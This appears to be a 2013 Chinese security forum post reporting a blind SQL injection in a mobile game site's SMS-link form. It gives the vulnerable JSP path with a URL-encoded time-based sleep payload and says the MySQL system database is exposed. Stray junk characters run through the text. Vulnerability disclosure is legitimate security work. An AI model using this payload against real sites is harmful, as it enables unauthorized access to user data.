简要描述: ?3 R8 G& a- `/ A% X3 [ E7 j* @
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。! z- u. v5 m: \( d3 R9 L
) j7 x% ?$ o! M6 ?9 p) i* m详细说明: |" K! K2 F' z# N" ?* z' \
存在SQL盲注url:# x& ^ r% _- }8 M* ]$ N
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1' E& G7 ]+ z: g( x% g5 u7 h5 Q
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png0 L) C! v$ p. z8 h
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png; \% h0 a6 B7 `8 D& F! m
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
+ I$ x* {2 \- ^' ]* q
) M( a# V5 @7 m2 u8 d7 b: p能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对